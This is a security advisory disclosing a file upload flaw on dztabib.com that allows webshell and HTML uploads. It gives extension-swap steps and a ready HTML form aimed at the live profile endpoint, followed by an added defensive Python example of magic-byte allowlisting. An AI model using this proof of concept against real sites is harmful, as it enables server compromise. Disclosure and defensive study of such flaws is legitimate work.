www.dztabib.com File upload vulnerability Leads to webshell upload

2019.06.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################################################################
# Title     : www.dztabib.com File upload vulnerability Leads to webshell & HTML files upload
# Founder   : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
# Date      : /02/06/2019
# Home      : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
##########################################################################

# PoC

[ + ] Register as a user on the website
[ + ] Log in to your account
[ + ] Go to this path : https://www.dztabib.com/parametres
[ + ] Upload your evil file with a jpeg extension. Don't forget to intercept the request with burp or tamper data, then change the extension into .Php3 or html and forward the request

Example : https://www.dztabib.com/storage/photo_profil/bBuSUDVeBeHTg0OTusInIVCXYzUkpuB57laqzrEx.

---------------------------------------------------------------------
<!-- File upload poc -->
<html lang="en">
<head>
  <title>File upload PoC</title>
  <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
  <style>
    button{border:2px solid #F00;border-radius:2px;}
    input{border:2px solid #F00;border-radius:2px;width:100px;}
    body .n00bi{font-family:'Iceland', cursive;color:green;text-shadow:2px 2px #F00;}
  </style>
  <script>
    function alert_me(){
      var Domain = "www.dztabib.com"
      alert("Path of Evil file : \n" + Domain + "/storage/photo_profil/" + "[ Evil ]");
    }
  </script>
</head>
<body style="background-image:url(https://media.giphy.com/media/smzfl3E7a4iHK/giphy.gif);text-align:center" onload="alert_me()">
  <div class="n00bi">
    <header>
      <h1> simple File upload form By Dj3Bb4rAn0n</h1>
    </header>
  </div><br>
  <div class="content_img">
    <article>
      <img src="https://www.upload.ee/image/10006478/a.jpg" alt="I'm n00b :V" />
    </article>
  </div><br>
  <form class="form-group" action="https://www.dztabib.com/edit/profile" method="post" enctype="multipart/form-data">
    <input type="hidden" name="_token" value="2TDQZOjUU28MU9iuGrXbZm2p7RZkbkrcPTuw0M4S"> <!-- Change it with your token -->
    <input type="hidden" name="_method" value="PUT">
    <input type="hidden" class="form-control" name="name" value="fuckyou" >
    <input type="hidden" class="form-control" name="prenom" value="fuckyou" >
    <input id="age" type="hidden" class="form-control" name="age" value="20" required autofocus>
    <input id="wilaya" type="hidden" class="form-control" name="wilaya" value="fuckyou" required autofocus>
    <input id="adresse" type="hidden" class="form-control" name="adresse" value="fuckyou@gmail.com" required autofocus> <!-- Change it with your email -->
    <input id="photo" type="file" class="form-control" name="photo" >
    <input id="email" type="hidden" class="form-control" name="email" value="FUCKER1@gmail.com" required>
    <button type="submit" class="n00b">Submit the request</button>
  </form>
</body>
</html>
--------------------------------------------------------------
Sh00tz To my PC
-------------------------------------------------------------
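
A server-side check that defeats the extension swap described in the PoC, as an added example that is not part of the original advisory or the site's code. The hypothetical `safe_stored_name` ignores the client filename and derives the stored extension from the file's magic bytes, while the hypothetical `naive_blocklist_allows` shows why a case-sensitive extension blocklist lets `.Php3` and `html` through; all names and sample bytes are constructed.

```python
import os
import secrets

# Allowlist: magic-byte prefix -> extension the server assigns itself.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Hypothetical weak control, shown only to illustrate why it fails.
NAIVE_BLOCKLIST = {".php", ".php3", ".phtml"}


def naive_blocklist_allows(client_filename: str) -> bool:
    """Weak check: trusts the client-supplied name, compares case-sensitively."""
    ext = os.path.splitext(client_filename)[1]
    return ext not in NAIVE_BLOCKLIST


def sniff_image_extension(data: bytes):
    """Return the extension of an allowlisted image type, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def safe_stored_name(client_filename: str, data: bytes) -> str:
    """Build the on-disk name from the content; client_filename is never used."""
    ext = sniff_image_extension(data)
    if ext is None:
        raise ValueError("upload rejected: not an allowlisted image type")
    # Random server-generated base name plus server-chosen extension.
    return secrets.token_hex(20) + ext


# Constructed sample uploads (not captured traffic).
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
SCRIPT_BYTES = b"<?php /* placeholder body */ ?>"
HTML_BYTES = b"<html><body>placeholder</body></html>"
```

The magic-byte check does not detect script content embedded inside a valid image; it is the server-chosen extension, together with serving the upload directory without script execution, that keeps such a file from running.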



Copyright 2024, cxsecurity.com

 
